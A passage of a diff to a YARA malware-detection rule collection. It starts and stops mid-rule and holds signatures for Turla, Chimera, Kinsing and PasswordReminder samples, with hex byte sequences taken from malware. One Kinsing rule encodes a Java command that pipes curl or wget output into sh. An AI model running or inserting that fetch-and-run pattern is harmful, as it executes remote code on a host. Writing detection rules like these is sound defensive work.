03 00 00 ba 01 00 00 00 4c 89 ee 4c 89 f7 e8 b1 5f ff ff 4c 8d ac 24 90 00 00 00 ba 01 00 00 00 4c 89 f6 4c 89 ef e8 99 5f ff ff 48 8b bc 24 b8 03 00 00 48 8d 43 10 48 89 84 24 b0 03 00 00 48 85 ff 74 05 e8 3b 42 f2 ff 48 8b bc 24 98 03 00 00 48 8d 43 10 48 89 84 24 90 03 00 00 48 85 ff 74 05 e8 1d 42 f2 ff 48 8d 43 10 49 8d 75 08 48 8d 3d e6 de 3b 00 48 89 05 d7 de 3b 00 e8 82 1a 02 00 48 8d 05 43 d9 0e 00 48 8b bc 24 98 00 00 00 c7 05 01 df 3b 00 01 00 00 00 48 89 05 d2 de 3b 00 48 8d 05 53 d9 0e 00 48 85 ff 48 89 05 c9 de 3b 00 48 8d 05 72 d9 0e 00 48 89 05 c3 de 3b 00 48 8d 05 94 d9 0e 00 48 89 05 bd de 3b 00 48 8d 05 de d9 0e 00 48 89 05 b7 de 3b 00 48 8d 43 10 48 89 84 24 90 00 00 00 74 05 e8 94 41 f2 ff 4c 8d ac 24 d0 03 00 00 4c 89 ef e8 14 bd 02 00 4c 8d b4 24 f0 03 00 00 ba 01 00 00 00 4c 89 ee 4c 89 f7 e8 ac 5e ff ff 4c 8d ac 24 b0 00 00 00 ba 03 00 00 00 4c 89 f6 4c 89 ef e8 94 5e ff ff 48 8b bc 24 f8 03 00 00 48 8d 43 10 48 89 84 24 f0 03 00 00 48 85 ff 74 05 e8 36 41 f2 ff 48 8b bc 24 d8 03 00 00 48 8d 43 10 48 89 84 24 d0 03 00 00 48 85 ff 74 05 e8 18 41 f2 ff 48 8d 43 10 49 8d 75 08 48 8d 3d 31 de 3b 00 48 89 05 22 de 3b 00 e8 7d 19 02 00 48 8d 05 56 d9 0e 00 48 8b bc 24 b8 00 00 00 c7 05 4c de 3b 00 01 00 00 00 48 89 05 1d de 3b 00 48 8d 05 6e d9 0e 00 48 85 ff 48 89 05 14 de 3b 00 48 8d 05 95 d9 0e 00 48 89 05 0e de 3b 00 48 8d 05 bf d9 0e 00 48 89 05 08 de 3b 00 48 8d 05 19 da 0e 00 48 89 05 02 de 3b 00 48 8d 43 10 48 89 84 24 b0 00 00 00 74 05 e8 8f 40 f2 ff 4c 8d ac 24 10 04 00 00 4c 89 ef e8 0f bc 02 00 4c 8d b4 24 30 04 00 00 ba 01 00 00 00 4c 89 ee 4c 89 f7 e8 a7 5d ff ff 4c 8d ac 24 d0 00 00 00 ba 05 00 00 00 4c 89 f6 4c 89 ef e8 8f 5d ff ff 48 8b bc 24 38 04 00 00 48 8d 43 10 48 89 84 24 30 04 00 00 48 85 ff 74 05 e8 31 40 f2 ff 48 8b bc 24 18 04 00 00 48 8d 43 10 48 89 84 24 10 04 00 00 48 85 ff 74 05 e8 13 40 f2 ff 48 8d 43 10 49 8d 75 08 48 8d 3d 7c dd 3b 00 48 89 05 6d dd 3b 00 e8 78 18 02 00 48 8d 05 99 d9 0e 00 48 8b bc 24 d8 00 00 00 c7 05 97 dd 3b 00 01 00 00 00 48 89 05 68 dd 3b 00 48 8d 05 b9 d9 0e 00 48 85 ff 48 89 05 5f dd 3b 00 48 8d 05 e8 d9 0e 00 48 89 05 59 dd 3b 00 48 8d 05 1a da 0e 00 48 89 05 53 dd 3b 00 48 8d 05 84 da 0e 00 48 89 05 4d dd 3b 00 48 8d 43 10 48 89 84 24 d0 00 00 00 74 05 e8 8a 3f f2 ff 4c 8d ac 24 50 04 00 00 4c 89 ef e8 0a bb 02 00 4c 8d b4 24 70 04 00 00 ba 01 00 00 00 4c 89 ee 4c 89 f7 e8 a2 5c ff ff 4c 8d ac 24 f0 00 00 00 ba 07 00 00 00 4c 89 f6 4c 89 ef e8 8a 5c ff ff 48 8b bc 24 78 04 00 00 48 8d 43 10 48 89 84 24 70 04 00 00 48 85 ff 74 05 e8 2c 3f f2 ff 48 8b bc 24 58 04 00 00 48 8d 43 10 48 89 84 24 50 04 00 00 48 85 ff 74 05 e8 0e 3f f2 ff 48 8d 43 10 49 8d 75 08 48 8d 3d c7 dc 3b 00 48 89 05 b8 dc 3b 00 e8 73 17 02 00 48 8d 05 0c da 0e 00 48 8b bc 24 f8 00 00 00 c7 05 e2 dc 3b 00 01 00 00 00 48 89 05 b3 dc 3b 00 48 8d 05 34 da 0e 00 48 85 ff 48 89 05 aa dc 3b 00 48 8d 05 6b da 0e 00 48 89 05 a4 dc 3b 00 48 8d 05 a5 da 0e 00 48 89 05 9e dc 3b 00 48 8d 05 1f db 0e 00 48 89 05 98 dc 3b 00 48 8d 43 10 48 89 84 24 f0 00 00 00 74 05 e8 85 3e f2 ff 4c 8d ac 24 90 04 00 00 4c 89 ef e8 05 ba 02 00 4c 8d b4 24 b0 04 00 00 ba 01 00 00 00 4c 89 ee 4c 89 f7 e8 9d 5b ff ff 4c 8d ac 24 10 01 00 00 ba 09 00 00 00 4c 89 f6 4c 89 ef e8 85 5b ff ff 48 8b bc 24 b8 04 00 00 48 8d 43 10 48 89 84 24 b0 04 00 00 48 85 ff 74 05 e8 27 3e f2 ff 48 8b bc 24 98 04 00 00 48 8d 43 10 48 89 84 24 90 04 00 00 48 85 ff 74 05 e8 09 3e f2 ff 48 8d 43 10 49 8d } - $seq2 = { 41 56 49 89 fe 41 55 41 89 cd 41 54 45 8d 60 01 55 53 44 89 c3 48 81 ec 98 06 00 00 41 39 cc 89 74 24 10 48 89 54 24 30 0f 84 ab 09 00 00 48 8d 84 24 80 00 00 00 41 8d 70 ff 48 8d ac 24 10 01 00 00 48 89 c7 48 89 44 24 48 e8 0f 89 f6 ff be 01 00 00 00 48 89 ef e8 02 51 f6 ff 4c 8d a4 24 e0 00 00 00 89 de 4c 89 e7 e8 f0 88 f6 ff 48 8d 84 24 b0 00 00 00 48 89 ea 4c 89 e6 48 89 c7 48 89 44 24 20 e8 55 8d f6 ff 48 8d 1d 4e a2 2f 00 49 8d 7c 24 08 4c 8d 7b 10 4c 89 bc 24 e0 00 00 00 e8 48 eb ea ff 48 8d 7d 08 4c 89 bc 24 10 01 00 00 e8 37 eb ea ff 48 8d 84 24 40 01 00 00 41 8d 75 ff 48 89 c7 48 89 44 24 38 e8 8e 88 f6 ff 48 8d 84 24 d0 01 00 00 be 01 00 00 00 48 89 c7 49 89 c7 48 89 44 24 50 e8 71 50 f6 ff 48 8d ac 24 a0 01 00 00 44 89 ee 48 89 ef e8 5e 88 f6 ff 48 8d 84 24 70 01 00 00 4c 89 fa 48 89 ee 48 89 c7 48 89 44 24 40 e8 c3 8c f6 ff 4c 8d 63 10 48 8d 7d 08 48 8d ac 24 00 02 00 00 4c 89 a4 24 a0 01 00 00 e8 b6 ea ea ff 4c 89 ff 4c 89 a4 24 d0 01 00 00 4c 8d a4 24 30 02 00 00 48 83 c7 08 e8 9a ea ea ff 4c 63 7c 24 10 49 8d 46 30 48 89 44 24 18 0f 1f 40 00 e8 b3 7c f6 ff 49 89 c5 e8 ab 75 f6 ff 4c 89 2c 24 4c 8b 6c 24 18 49 89 c1 48 8b 4c 24 20 48 8b 54 24 48 41 b8 01 00 00 00 48 8b 74 24 30 4c 89 ef e8 32 f9 f6 ff 4c 89 fe 48 89 ef e8 b7 4f f6 ff 4c 89 ea 48 89 ee 4c 89 e7 e8 09 d9 f6 ff 48 8b 4c 24 40 48 8b 54 24 38 4d 89 e1 48 8b 74 24 30 4c 89 2c 24 41 b8 01 00 00 00 4c 89 f7 e8 f5 f8 f6 ff 48 8b 94 24 50 02 00 00 48 8b 8c 24 40 02 00 00 41 89 c5 48 39 8c 24 48 02 00 00 48 8d 43 10 48 0f 46 8c 24 48 02 00 00 48 85 d2 48 89 84 24 30 02 00 00 74 10 48 89 d7 31 c0 f3 48 ab 48 89 d7 e8 40 4f f7 ff 48 8b 94 24 20 02 00 00 48 8b 8c 24 10 02 00 00 48 8d 43 10 48 39 8c 24 18 02 00 00 48 0f 46 8c 24 18 02 00 00 48 89 84 24 00 02 00 00 48 85 d2 74 10 48 89 d7 31 c0 f3 48 ab 48 89 d7 e8 fe 4e f7 ff 45 84 ed 0f 84 fd fe ff ff 83 7c 24 10 01 0f 84 bc 04 00 00 48 8d 84 24 e0 03 00 00 4c 8d ac 24 c0 05 00 00 48 89 44 24 10 48 8d 84 24 10 04 00 00 48 89 44 24 08 49 8d 45 08 } - $seq3 = { 4c 8d bc 24 00 05 00 00 be 01 00 00 00 4c 89 ff e8 9b 4e f6 ff 4c 8d a4 24 30 05 00 00 4c 89 fa 4c 89 f6 4c 89 e7 e8 05 88 f6 ff 48 8d ac 24 60 05 00 00 48 8b 54 24 18 4c 89 e6 48 89 ef e8 5d d3 f6 ff 48 8d 84 24 90 05 00 00 4c 89 f1 4c 89 ea 48 89 ee 48 89 c7 48 89 44 24 28 e8 ef b9 ff ff 48 8b 74 24 28 49 8d 7e 60 e8 01 59 f6 ff 48 8b 94 24 b0 05 00 00 48 8b 8c 24 a0 05 00 00 48 8d 43 10 48 39 8c 24 a8 05 00 00 48 0f 46 8c 24 a8 05 00 00 48 89 84 24 90 05 00 00 48 85 d2 74 10 48 89 d7 31 c0 f3 48 ab 48 89 d7 e8 ff 4d f7 ff 48 8b 94 24 80 05 00 00 48 8b 8c 24 70 05 00 00 48 8d 43 10 48 39 8c 24 78 05 00 00 48 0f 46 8c 24 78 05 00 00 48 89 84 24 60 05 00 00 48 85 d2 74 10 48 89 d7 31 c0 f3 48 ab 48 89 d7 e8 bd 4d f7 ff 48 8b 94 24 50 05 00 00 48 8b 8c 24 40 05 00 00 48 8d 43 10 48 39 8c 24 48 05 00 00 48 0f 46 8c 24 48 05 00 00 48 89 84 24 30 05 00 00 } - $seq4 = { 49 89 ff 41 56 49 89 f6 41 55 41 54 55 53 49 8d 9e c8 01 00 00 48 81 ec f8 05 00 00 48 8d bc 24 d0 00 00 00 e8 e5 52 00 00 48 8d bc 24 00 01 00 00 be 06 0e 5d 00 e8 33 99 ff ff 48 8d b4 24 00 01 00 00 48 8d bc 24 d0 00 00 00 48 89 da e8 bb eb ff ff 48 8b 84 24 00 01 00 00 48 8d b4 24 60 04 00 00 49 8d 9e c0 01 00 00 48 8d 78 e8 e8 9b 10 fd ff 48 8d bc 24 20 01 00 00 be 79 e3 5b 00 e8 e9 98 ff ff 48 8d b4 24 20 01 00 00 48 8d bc 24 d0 00 00 00 48 89 da e8 71 eb ff ff 48 8b 84 24 20 01 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 58 10 fd ff 48 8d 7c 24 20 4c 89 f6 e8 6b 9d ff ff 48 8d bc 24 40 01 00 00 be 14 e4 5b 00 e8 99 98 ff ff 48 8d 54 24 20 48 8d b4 24 40 01 00 00 48 8d bc 24 d0 00 00 00 e8 1f eb ff ff 48 8b 84 24 40 01 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 06 10 fd ff 48 8b 44 24 20 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 f0 0f fd ff 48 8d bc 24 60 01 00 00 be 1d e4 5b 00 e8 3e 98 ff ff 48 8d bc 24 c0 00 00 00 e8 41 22 fd ff 48 8d b4 24 c0 00 00 00 48 8d bc 24 60 04 00 00 e8 cc 0f fd ff 48 8d 8c 24 60 04 00 00 48 8d b4 24 60 01 00 00 48 8d bc 24 d0 00 00 00 ba 3f 26 5e 00 e8 fa ce 00 00 48 8d bc 24 60 04 00 00 e8 7d 19 fd ff 48 8d bc 24 c0 00 00 00 e8 70 19 fd ff 48 8b 84 24 60 01 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 67 0f fd ff 48 8d bc 24 80 01 00 00 be 90 e4 5b 00 e8 b5 97 ff ff 48 8d b4 24 80 01 00 00 48 8d bc 24 d0 00 00 00 ba 48 38 8a 00 e8 3b ea ff ff 48 8b 84 24 80 01 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 22 0f fd ff 48 8d 94 24 20 04 00 00 48 8d b4 24 00 04 00 00 4c 89 f7 48 c7 84 24 00 04 00 00 78 24 8a 00 48 c7 84 24 20 04 00 00 78 24 8a 00 e8 f2 9c ff ff 48 8d bc 24 a0 01 00 00 be 24 e4 5b 00 e8 40 97 ff ff 48 8d 94 24 00 04 00 00 48 8d b4 24 a0 01 00 00 48 8d bc 24 d0 00 00 00 e8 c3 e9 ff ff 48 8b 84 24 a0 01 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 aa 0e fd ff 48 8d bc 24 c0 01 00 00 be 2d e4 5b 00 e8 f8 96 ff ff 48 8d 94 24 20 04 00 00 48 8d b4 24 c0 01 00 00 48 8d bc 24 d0 00 00 00 e8 7b e9 ff ff 48 8b 84 24 c0 01 00 00 48 8d b4 24 60 04 00 00 48 8d ac 24 e0 03 00 00 48 8d 78 e8 e8 5a 0e fd ff c7 84 24 e0 03 00 00 00 00 00 00 48 89 ac 24 60 04 00 00 e8 e2 e4 fd ff 48 8d 94 24 60 04 00 00 48 8d bc 24 40 04 00 } - $seq5 = { e8 bb e4 fd ff 48 8d bc 24 40 04 00 00 48 89 84 24 e0 01 00 00 e8 b6 e9 05 00 48 89 c3 48 89 84 24 e8 01 00 00 e8 96 1d fd ff 8b 40 08 48 83 c3 08 be 33 e4 5b 00 48 89 df 89 84 24 f0 01 00 00 e8 7b e9 fd ff 48 8b b4 24 00 04 00 00 48 89 df 48 8b 56 e8 e8 67 e6 fd ff 48 8d bc 24 e0 01 00 00 e8 5a d9 fd ff 48 83 bc 24 40 04 00 00 00 75 8f c7 84 24 e0 03 00 00 00 00 00 00 48 89 ac 24 60 04 00 00 e8 37 e4 fd ff 48 8d 94 24 60 04 00 00 48 8d bc 24 40 04 00 00 48 89 c6 } - $seq6 = { 48 8d bc 24 40 04 00 00 48 89 84 24 00 02 00 00 e8 0e e9 05 00 48 89 c3 48 89 84 24 08 02 00 00 e8 ee 1c fd ff 8b 40 08 48 83 c3 08 be 3e e4 5b 00 48 89 df 89 84 24 10 02 00 00 e8 d3 e8 fd ff 48 8b b4 24 20 04 00 00 48 89 df 48 8b 56 e8 e8 bf e5 fd ff 48 8d bc 24 00 02 00 00 e8 b2 d8 fd ff 48 83 bc 24 40 04 00 00 00 75 8f 48 8b 84 24 20 04 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 ee 0c fd ff 48 8b 84 24 00 04 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 d5 0c fd ff e8 10 c9 fe ff 84 c0 0f 84 48 02 00 00 48 8d 74 24 1d c6 04 24 00 48 89 ef e8 07 97 00 00 48 8b bc 24 e0 03 00 00 48 8d b4 24 00 04 00 00 48 c7 84 24 00 04 00 00 00 00 00 00 48 c7 84 24 08 04 00 00 00 00 00 00 48 c7 84 24 10 04 00 00 00 00 00 00 e8 3e db fe ff 84 c0 0f 84 c9 00 00 00 48 8b 84 24 08 04 00 00 48 2b 84 24 00 04 00 00 48 c1 f8 03 } - $seq7 = { 48 83 bc 24 40 04 00 00 00 75 95 48 8d bc 24 00 04 00 00 e8 b0 9e fe ff 48 8b bc 24 e8 03 00 00 48 85 ff 74 05 e8 0e 66 ff ff 48 8d bc 24 f0 00 00 00 e8 81 4d 00 00 48 8d b4 24 f0 00 00 00 4c 89 f7 e8 81 f0 ff ff 48 8d bc 24 40 04 00 00 be 02 e5 5b 00 e8 bf 93 ff ff 48 8d 94 24 f0 00 00 00 48 8d b4 24 40 04 00 00 48 8d bc 24 d0 00 00 00 e8 f2 d1 00 00 48 8b 84 24 40 04 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 29 0b fd ff 48 8d bc 24 60 04 00 00 be 18 00 00 00 e8 07 0e fd ff 48 8d bc 24 70 04 00 00 48 8d b4 24 d0 00 00 00 ba 01 00 00 00 e8 5d ad 00 00 48 8d b4 24 78 04 00 00 48 8d bc 24 b0 00 00 00 e8 38 0c fd ff 48 8d 94 24 b0 00 00 00 4c 89 f6 4c 89 ff e8 e5 c6 ff ff 48 8b 84 24 b0 00 00 00 48 8d b4 24 40 04 00 00 48 8d 78 e8 e8 bc 0a fd ff 48 8d bc 24 60 04 00 00 e8 cf 16 fd ff 48 8d bc 24 f0 00 00 00 e8 52 4d 00 00 48 8d bc 24 d0 00 00 00 e8 45 4d 00 00 48 81 c4 f8 05 00 00 4c 89 f8 5b 5d 41 5c 41 5d } - $seq8 = { 4c 8d a4 24 64 05 00 00 66 0f 1f 44 00 00 e8 23 de fd ff 48 8d 94 24 20 04 00 00 48 8d bc 24 a0 03 00 00 48 89 c6 e8 eb df fd ff 48 8b 9c 24 a8 03 00 00 be f7 e4 5b 00 48 8d 7b 08 e8 f5 e2 fd ff 48 8d 7b 70 4c 89 e6 e8 d9 0b fd ff 48 8d bc 24 a0 03 00 00 e8 dc d2 fd ff 48 83 bc 24 20 04 00 00 00 75 a9 48 8d 84 24 c0 03 00 00 be 6c e4 5b 00 48 89 c7 48 89 44 24 08 e8 77 8f ff ff 48 8b 5c 24 08 48 8d 94 24 60 04 00 00 48 8d bc 24 d0 00 00 00 48 89 de e8 7a c8 00 00 48 8b 84 24 c0 03 00 00 48 8d b4 24 40 04 00 00 48 8d 78 e8 e8 e1 06 fd ff 48 8d b4 24 23 05 00 00 48 8d bc 24 a0 00 00 00 48 89 da e8 29 0d fd ff 48 8d 94 24 a0 03 00 00 48 8d b4 24 60 04 00 00 48 8d bc 24 90 00 00 00 e8 0c 0d fd ff 48 8d bc 24 90 00 00 00 be 90 d6 5c 00 e8 ba 16 fd ff 48 8b 10 48 89 94 24 20 04 00 00 48 c7 00 78 24 8a 00 48 8b 94 24 20 04 00 00 48 8b 84 24 a0 00 00 00 48 8b 4a e8 48 89 ce 48 03 70 e8 48 3b 72 f0 76 0a 48 3b 70 f0 0f 86 b7 08 00 00 48 8d b4 24 a0 00 00 00 48 8d bc 24 20 04 00 00 e8 08 0c fd ff 48 8b 10 be 8d e4 5b 00 48 89 ef 48 89 94 24 40 04 00 00 48 c7 00 78 24 8a 00 e8 89 8e ff ff 48 8d 94 24 40 04 00 00 48 8d bc 24 d0 00 00 00 48 89 ee e8 11 e1 ff ff 48 8b 84 24 e0 03 00 00 48 8d b4 24 00 04 00 00 48 8d 78 e8 e8 f8 05 fd ff 48 8b 84 24 40 04 00 00 48 8d b4 24 00 04 00 00 48 8d 78 e8 e8 df 05 fd ff 48 8b 84 24 20 04 00 00 48 8d b4 24 40 04 00 00 48 8d 78 e8 e8 c6 05 fd ff 48 8b 84 24 90 00 00 00 48 8d b4 24 40 04 00 00 48 8d 78 e8 e8 ad 05 fd ff 48 8b 84 24 a0 00 00 00 48 8d b4 24 40 04 00 00 48 8d 78 e8 e8 94 05 fd ff 48 8d bc 24 00 04 00 00 be 4c e4 5b 00 e8 e2 8d ff ff 48 8d 94 24 e2 04 00 00 48 8d b4 24 00 04 00 00 48 8d bc 24 d0 00 00 00 e8 e5 c6 00 00 48 8b 84 24 00 04 00 00 48 8d b4 24 40 04 00 00 48 8d 78 e8 e8 4c 05 fd ff 48 8d bc 24 20 04 00 00 be 98 e4 5b 00 e8 9a 8d ff ff 48 8d 94 24 64 05 00 00 48 8d b4 24 20 04 00 00 48 8d bc 24 d0 00 00 00 e8 9d c6 00 00 48 8b 84 24 20 04 00 00 48 8d b4 24 40 04 00 00 48 8d 78 e8 } - - condition: - uint32(0)==0x464c457f and filesize >300KB and 7 of ($s*) -} -rule ARKBIRD_SOLG_APT_Turla_Ironpython_Apr_2021_1 : FILE -{ - meta: - description = "Detect IronPython script used by Turla group" - author = "Arkbird_SOLG" - id = "303929d4-2c43-5e43-aeb0-09f469f7091b" - date = "2021-04-30" - modified = "2021-05-01" - reference = "https://twitter.com/DrunkBinary/status/1388332507695919104" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-01/Turla/APT_Turla_IronPython_Apr_2021_1.yara#L1-L26" - license_url = "N/A" - logic_hash = "f6b626cddb4832f842a15eddce705fb24125e4341c425cf27dbbe537e2a98bdc" - score = 75 - quality = 57 - tags = "FILE" - hash1 = "65b43e30547ae4066229040c9056aa9243145b9ae5f3b9d0a01a5068ef9a0361" - hash2 = "c430ebab4bf827303bc4ad95d40eecc7988bdc17cc139c8f88466bc536755d4e" - hash3 = "f76257749792cc4e54f75d0e7a83e7a4429395c5dbc48078a8068575d7e9a98" - tlp = "White" - adversary = "Turla" - - strings: - $s1 = { 6c 61 6d 62 64 61 20 73 2c 6b 3a 27 27 2e 6a 6f 69 6e 28 5b 63 68 72 28 28 6f 72 64 28 63 29 5e 6b 29 25 30 78 31 30 30 29 20 66 6f 72 20 63 20 69 6e 20 73 5d 29 } - $s2 = { 66 72 6f 6d 20 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 43 72 79 70 74 6f 67 72 61 70 68 79 20 69 6d 70 6f 72 74 2a } - $s3 = { 52 69 6a 6e 64 61 65 6c 4d 61 6e 61 67 65 64 28 4b 65 79 53 69 7a 65 3d 31 32 38 2c 42 6c 6f 63 6b 53 69 7a 65 3d 31 32 38 29 } - $s4 = { 72 65 74 75 72 6e 20 53 79 73 74 65 6d 2e 41 72 72 61 79 5b 53 79 73 74 65 6d 2e 42 79 74 65 5d 28 5b 6f 72 64 28 78 29 66 6f 72 20 78 20 69 6e 20 6c 69 73 74 28 73 74 72 29 5d 29 } - $s5 = { 53 79 73 74 65 6d 2e 41 72 72 61 79 2e 43 72 65 61 74 65 49 6e 73 74 61 6e 63 65 28 53 79 73 74 65 6d 2e 42 79 74 65 2c [10-12] 2e 4c 65 6e 67 74 68 29 } - $s6 = { 28 62 61 73 65 36 34 2e 62 36 34 64 65 63 6f 64 65 28 [4-10] 5b 31 36 3a 5d 29 2c 73 79 73 2e 61 72 67 76 5b 31 5d 2c [4-10] 5b 3a 31 36 5d 2c } - $s7 = { 41 73 73 65 6d 62 6c 79 2e 4c 6f 61 64 28 } - $s8 = { 20 69 66 20 6c 65 6e 28 73 79 73 2e 61 72 67 76 29 21 3d 32 3a } - $s9 = { 65 78 63 65 70 74 20 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 45 78 63 65 70 74 69 6f 6e 20 61 73 20 65 78 3a } - $s10 = { 69 66 20 5f 5f 6e 61 6d 65 5f 5f 3d 3d } - $s11 = { 2e 66 6f 72 6d 61 74 28 65 78 2e 4d 65 73 73 61 67 65 2c 65 78 2e 53 74 61 63 6b 54 72 61 63 65 29 29 } - - condition: - filesize >100KB and 9 of ($s*) -} rule ARKBIRD_SOLG_MAL_Milan_Aug_2021_1 : FILE { meta: @@ -193587,1106 +195384,1538 @@ rule ARKBIRD_SOLG_MAL_Shark_Aug_2021_1 : FILE condition: uint16(0)==0x5A4D and filesize >15KB and 6 of ($s*) } -rule ARKBIRD_SOLG_APT_Chimera_Sept_2020_1 : FILE +rule ARKBIRD_SOLG_Loader_JAVA_Kinsing_Aug_2020_Variant_A_1 : FILE { meta: - description = "Detect Cobalt Strike agent used by Chimera" + description = "Detect Kinsing Variant A" author = "Arkbird_SOLG" - id = "7a7c3952-fa6e-5643-a40f-d2e466b8c2a2" - date = "2020-10-03" - modified = "2020-10-04" + id = "470fd4a6-faba-52b5-8ffa-5ac33fb607a0" + date = "2020-08-28" + modified = "2020-08-29" + reference = "https://twitter.com/JAMESWT_MHT/status/1299222198574632961" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-28/Loader_JAVA_Kinsing_Aug_2020_1.yar#L2-L30" + license_url = "N/A" + logic_hash = "a9654b67ca6fb5de23d385707f01196d6d1c85e527d2bdbe312a2b2fcf998dc0" + score = 75 + quality = 67 + tags = "FILE" + hash1 = "22063638b9f05870e14110ccab9e07d744204360b184cfec0075f9fd27e08488" + hash2 = "248dd35d069d6b106b7528e41f95cd8cef0140fbb60808aa51c99ac117cf3318" + hash3 = "6ec5b8ea86d0af908182d6afc63c85a817e0612dba6e5e4b126b5639ab048b16" + hash4 = "b82d9e0ea2b6139438ce0b805fb03c3ae89ada9d4fdd7722562e6075f706048c" + + strings: + $ClassCode1 = { 4c 69 66 45 78 70 2e 6a 61 76 61 0c 00 3f 00 40 } + $ClassCode2 = "java/lang/StringBuilder" fullword ascii + $ClassCode3 = "java/net/URL" fullword ascii + $ClassCode4 = "java/net/URLConnection" fullword ascii + $ClassCode5 = { 6a 61 76 61 2f 6c 61 6e 67 2f 50 72 6f 63 65 73 73 42 75 69 6c 64 65 72 01 00 02 2e 2f } + $Com1 = { 52 75 6E 74 69 6D 65 2E 67 65 74 52 75 6E 74 69 6D 65 28 29 2E 65 78 65 63 28 6E 65 77 20 53 74 72 69 6E 67 5B 5D 20 7B 20 22 2F 62 69 6E 2F 62 61 73 68 22 2C 20 22 2D 63 22 2C 20 22 63 75 72 6C 20 22 20 2B 20 73 20 2B 20 22 7C 73 68 22 20 7D } + $Com2 = { 52 75 6E 74 69 6D 65 2E 67 65 74 52 75 6E 74 69 6D 65 28 29 2E 65 78 65 63 28 6E 65 77 20 53 74 72 69 6E 67 5B 5D 20 7B 20 22 2F 62 69 6E 2F 62 61 73 68 22 2C 20 22 2D 63 22 2C 20 22 77 67 65 74 20 2D 71 20 2D 4F 20 2D 20 22 20 2B 20 73 20 2B 20 22 7C 73 68 22 20 7D } + $Com3 = "chmod +x " fullword ascii + $Com4 = { 53 4b 4c 01 00 02 6c 66 } + $s1 = "User-Agent" fullword ascii + $s2 = "kinsing" fullword ascii + $s3 = { 6f 73 2e 6e 61 6d 65 } + $s4 = "getAbsolutePath" fullword ascii + $s5 = { 6f 70 65 6e 43 6f 6e 6e 65 63 74 69 6f 6e } + + condition: + filesize <1KB and 4 of ($ClassCode*) and 3 of ($Com*) and 3 of ($s*) +} +rule ARKBIRD_SOLG_Loader_JAVA_Kinsing_Aug_2020_Variant_B_1 : FILE +{ + meta: + description = "Detect Kinsing Variant B" + author = "Arkbird_SOLG" + id = "7e0f9826-806c-5801-aab5-d2a8dba4e206" + date = "2020-08-28" + modified = "2020-08-29" + reference = "https://twitter.com/JAMESWT_MHT/status/1299222198574632961" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-28/Loader_JAVA_Kinsing_Aug_2020_1.yar#L32-L52" + license_url = "N/A" + logic_hash = "5862d02b4e57024aa1c00b0a10ac9ee1a733890cf7d5b9ec7586f0506af113fc" + score = 75 + quality = 75 + tags = "FILE" + hash1 = "e1471e8f9c1aa1457f819c0565a3444c53d3ec5fadf9f52ae988fde8e2d3a960" + hash2 = "e70ea87d00567d33e20ed8649ef532eda966a8b5b1e83ea19728528d991eaaa0" + + strings: + $ClassCode1 = { 4c 69 66 45 78 70 2e 6a 61 76 61 0c 00 3f 00 40 } + $ClassCode2 = "java/lang/StringBuilder" fullword ascii + $ClassCode3 = "java/net/URL" fullword ascii + $ClassCode4 = { 6a 61 76 61 2f 6c 61 6e 67 2f 50 72 6f 63 65 73 73 42 75 69 6c 64 65 72 01 00 02 2e 2f } + $Com1 = "chmod +x " fullword ascii + $Com2 = { 53 4b 4c 01 00 02 6c 66 } + $s1 = "kinsing" fullword ascii + $s2 = "getAbsolutePath" fullword ascii + + condition: + filesize <1KB and 3 of ($ClassCode*) and 1 of ($Com*) and 2 of ($s*) +} +rule ARKBIRD_SOLG_SP_Vault7_SIG_F_Nov_2020_1 : FILE +{ + meta: + description = "Detect open-source PasswordReminder recovery tools used by Chinese APT in the Past" + author = "Arkbird_SOLG" + id = "0b65e333-16e2-57c3-84f0-5cd24c9d9593" + date = "2020-11-30" + modified = "2020-11-30" reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-03/Chimera/APT_Chimera_Sept_2020_1.yar#L1-L23" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-30/SP_Vault7_SIG_F_Nov_2020_1.yar#L1-L23" license_url = "N/A" - logic_hash = "8fdb34c793534f8632fd2c35b89462d4a736a31f2347e7bab3e8bcebff04c21f" + logic_hash = "b03ffb433491b532d891f29aeb5b33c6578067f2f05845514a7bdc1e50f88a10" score = 75 quality = 75 tags = "FILE" - hash1 = "f6d89ff139f4169e8a67332a0fd55b6c9beda0b619b1332ddc07d9a860558bab" + hash1 = "e6e17f2b2ce0ae07cf48654156b79ee90d330961456f731e84c94f50fe34f802" + hash2 = "c224ee5bef42a45e84e0d5a409d8b4c3842b2a7ac3fe5006ee795e64e0778e6e" strings: - $header = { 4D 5A 41 52 55 48 89 E5 48 83 EC 20 48 83 E4 F0 E8 00 00 00 00 5B 48 81 C3 EB 18 00 00 FF D3 48 81 C3 00 09 03 00 49 89 D8 6A 04 5A FF D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E8 } - $s1 = "\\\\%s\\pipe\\%s" fullword ascii - $s2 = "%04x-%04x:%s" fullword wide - $core1 = "core_pivot_session_new" fullword ascii - $core2 = "core_pivot_session_died" fullword ascii - $core3 = "core_pivot_remove" fullword ascii - $core4 = "core_pivot_add" fullword ascii - $lib1 = "CreateNamedPipeA" fullword ascii - $lib2 = "ConnectNamedPipe" fullword ascii - $lib3 = "WinHttpGetIEProxyConfigForCurrentUser" fullword ascii - $export = "ReflectiveLoader" fullword ascii + $dbg1 = { 50 61 73 73 77 6f 72 64 52 65 6d 69 6e 64 65 72 20 69 73 20 75 6e 61 62 6c 65 20 74 6f 20 66 69 6e 64 20 57 69 6e 4c 6f 67 6f 6e 20 6f 72 20 79 6f 75 20 61 72 65 20 75 73 69 6e 67 